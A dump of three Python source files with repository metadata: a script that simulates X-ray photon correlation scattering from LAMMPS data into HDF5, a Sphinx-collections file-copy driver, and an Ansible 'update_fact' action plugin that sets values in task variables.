353a5d55eb876f494195bab8603dd502b77f30e8 | 1,319 | py | Python | xpcs/calc_scattering.py | aryabhatt/xpcs-baseline | ad88044d1ec391dc1dd44d5b8f372a16e5c7d431 | [
"BSD-2-Clause"
] | null | null | null | xpcs/calc_scattering.py | aryabhatt/xpcs-baseline | ad88044d1ec391dc1dd44d5b8f372a16e5c7d431 | [
"BSD-2-Clause"
] | 1 | 2020-03-23T22:54:40.000Z | 2020-03-23T22:54:40.000Z | xpcs/calc_scattering.py | aryabhatt/xpcs-baseline | ad88044d1ec391dc1dd44d5b8f372a16e5c7d431 | [
"BSD-2-Clause"
] | 4 | 2019-08-30T12:12:59.000Z | 2021-12-28T06:33:07.000Z | #! /usr/bin/env python
import mdscatter
import numpy as np
import h5py
import time
import os
from loader import list_lammps_txt_files, load_lammps_txt
from detector import Lambda750k
if __name__ == '__main__':
wavelen = 0.1127
energy = 1.23984 / wavelen
sdd = 4.
scale = 28
center = (0, 768)
# read data
datadir = '../lammps'
pattern = 'al.*.txt'
txtfiles = list_lammps_txt_files(datadir, pattern)
Nsteps = len(txtfiles)
# load detector
detector = Lambda750k()
qvecs = detector.qvectors(sdd, center, wavelen)
# output hdf5 file
outf = 'xpcs.h5'
h5f = h5py.File(outf, 'w')
grp = h5f.create_group('xpcs')
dset = grp.create_dataset('imgs', (Nsteps, *detector.shape), 'f')
qtmp = grp.create_dataset('q_points', (*detector.shape, 3), 'f')
qtmp[:] = qvecs.reshape(*detector.shape, 3)
# turn the crank
t0 = time.time()
for i in range(Nsteps):
mdsim = load_lammps_txt(txtfiles[i], origin=np.array([8, 8, 8]), scale=scale)
pts = mdsim['POSITIONS']
img = mdscatter.dft(pts, qvecs)
img = np.abs(img)**2
img = np.reshape(img, detector.shape)
dset[i,:,:] = np.reshape(img, detector.shape)
t1 = time.time() - t0
print('time taken = %f\n' % t1)
h5f.close()
| 25.365385 | 85 | 0.611069 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 183 | 0.138741 |
353add44ddd63c2400e5193caf4b4d8f081b481a | 895 | py | Python | sphinxcontrib/collections/drivers/copy_file.py | useblocks/sphinx-collections | 4f1fd7d4f4682a2df47cdde98b9668d59b2983ff | [
"MIT"
] | 4 | 2020-05-22T16:22:14.000Z | 2021-11-09T11:48:04.000Z | sphinxcontrib/collections/drivers/copy_file.py | useblocks/sphinx-collections | 4f1fd7d4f4682a2df47cdde98b9668d59b2983ff | [
"MIT"
] | 1 | 2020-07-10T23:03:24.000Z | 2020-07-10T23:03:24.000Z | sphinxcontrib/collections/drivers/copy_file.py | useblocks/sphinx-collections | 4f1fd7d4f4682a2df47cdde98b9668d59b2983ff | [
"MIT"
] | 1 | 2020-05-22T17:27:39.000Z | 2020-05-22T17:27:39.000Z | import os
from shutil import copyfile
from sphinxcontrib.collections.drivers import Driver
class CopyFileDriver(Driver):
def run(self):
self.info('Copy file...')
if not os.path.exists(self.config['source']):
self.error('Source {} does not exist'.format(self.config['source']))
return
try:
copyfile(self.config['source'],
self.config['target'])
except IOError as e:
self.error('Problems during copying file.', e)
def clean(self):
try:
os.remove(self.config['target'])
self.info('File deleted: {}'.format(self.config['target']))
except FileNotFoundError:
pass # Already cleaned? I'm okay with it.
except IOError as e:
self.error('Problems during cleaning for collection {}'.format(self.config['name']), e)
| 27.96875 | 99 | 0.587709 | 798 | 0.89162 | 0 | 0 | 0 | 0 | 0 | 0 | 223 | 0.249162 |
353b5a343ec76d28979a240a4db7c75dd7f261d3 | 6,598 | py | Python | venv/lib/python3.6/site-packages/ansible_collections/ansible/utils/plugins/action/update_fact.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | 1 | 2020-01-22T13:11:23.000Z | 2020-01-22T13:11:23.000Z | venv/lib/python3.6/site-packages/ansible_collections/ansible/utils/plugins/action/update_fact.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | 12 | 2020-02-21T07:24:52.000Z | 2020-04-14T09:54:32.000Z | venv/lib/python3.6/site-packages/ansible_collections/ansible/utils/plugins/action/update_fact.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright 2020 Red Hat
# GNU General Public License v3.0+
# (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import ast
import re
from ansible.plugins.action import ActionBase
from ansible.module_utils.common._collections_compat import (
MutableMapping,
MutableSequence,
)
from ansible.module_utils._text import to_native
from jinja2 import Template, TemplateSyntaxError
from ansible_collections.ansible.utils.plugins.modules.update_fact import (
DOCUMENTATION,
)
from ansible_collections.ansible.utils.plugins.module_utils.common.argspec_validate import (
AnsibleArgSpecValidator,
)
from ansible.errors import AnsibleActionFail
class ActionModule(ActionBase):
"""action module"""
def __init__(self, *args, **kwargs):
"""Start here"""
super(ActionModule, self).__init__(*args, **kwargs)
self._supports_async = True
self._updates = None
self._result = None
def _check_argspec(self):
aav = AnsibleArgSpecValidator(
data=self._task.args, schema=DOCUMENTATION, name=self._task.action
)
valid, errors, self._task.args = aav.validate()
if not valid:
raise AnsibleActionFail(errors)
def _ensure_valid_jinja(self):
"""Ensure each path is jinja valid"""
errors = []
for entry in self._task.args["updates"]:
try:
Template("{{" + entry["path"] + "}}")
except TemplateSyntaxError as exc:
error = (
"While processing '{path}' found malformed path."
" Ensure syntax follows valid jinja format. The error was:"
" {error}"
).format(path=entry["path"], error=to_native(exc))
errors.append(error)
if errors:
raise AnsibleActionFail(" ".join(errors))
@staticmethod
def _field_split(path):
"""Split the path into it's parts
:param path: The user provided path
:type path: str
:return: the individual parts of the path
:rtype: list
"""
que = list(path)
val = que.pop(0)
fields = []
try:
while True:
field = ""
# found a '.', move to the next character
if val == ".":
val = que.pop(0)
# found a '[', pop until ']' and then get the next
if val == "[":
val = que.pop(0)
while val != "]":
field += val
val = que.pop(0)
val = que.pop(0)
else:
while val not in [".", "["]:
field += val
val = que.pop(0)
try:
# make numbers numbers
fields.append(ast.literal_eval(field))
except Exception:
# or strip the quotes
fields.append(re.sub("['\"]", "", field))
except IndexError:
# pop'ed past the end of the que
# so add the final field
try:
fields.append(ast.literal_eval(field))
except Exception:
fields.append(re.sub("['\"]", "", field))
return fields
def set_value(self, obj, path, val):
"""Set a value
:param obj: The object to modify
:type obj: mutable object
:param path: The path to where the update should be made
:type path: list
:param val: The new value to place at path
:type val: string, dict, list, bool, etc
"""
first, rest = path[0], path[1:]
if rest:
try:
new_obj = obj[first]
except (KeyError, TypeError):
msg = (
"Error: the key '{first}' was not found "
"in {obj}.".format(obj=obj, first=first)
)
raise AnsibleActionFail(msg)
self.set_value(new_obj, rest, val)
else:
if isinstance(obj, MutableMapping):
if obj.get(first) != val:
self._result["changed"] = True
obj[first] = val
elif isinstance(obj, MutableSequence):
if not isinstance(first, int):
msg = (
"Error: {obj} is a list, "
"but index provided was not an integer: '{first}'"
).format(obj=obj, first=first)
raise AnsibleActionFail(msg)
if first > len(obj):
msg = "Error: {obj} not long enough for item #{first} to be set.".format(
obj=obj, first=first
)
raise AnsibleActionFail(msg)
if first == len(obj):
obj.append(val)
self._result["changed"] = True
else:
if obj[first] != val:
obj[first] = val
self._result["changed"] = True
else:
msg = "update_fact can only modify mutable objects."
raise AnsibleActionFail(msg)
def run(self, tmp=None, task_vars=None):
"""action entry point"""
self._task.diff = False
self._result = super(ActionModule, self).run(tmp, task_vars)
self._result["changed"] = False
self._check_argspec()
results = set()
self._ensure_valid_jinja()
for entry in self._task.args["updates"]:
parts = self._field_split(entry["path"])
obj, path = parts[0], parts[1:]
results.add(obj)
if obj not in task_vars["vars"]:
msg = "'{obj}' was not found in the current facts.".format(
obj=obj
)
raise AnsibleActionFail(msg)
retrieved = task_vars["vars"].get(obj)
if path:
self.set_value(retrieved, path, entry["value"])
else:
if task_vars["vars"][obj] != entry["value"]:
task_vars["vars"][obj] = entry["value"]
self._result["changed"] = True
for key in results:
value = task_vars["vars"].get(key)
self._result[key] = value
return self._result
| 35.473118 | 93 | 0.507426 | 5,824 | 0.882692 | 0 | 0 | 1,484 | 0.224917 | 0 | 0 | 1,477 | 0.223856 |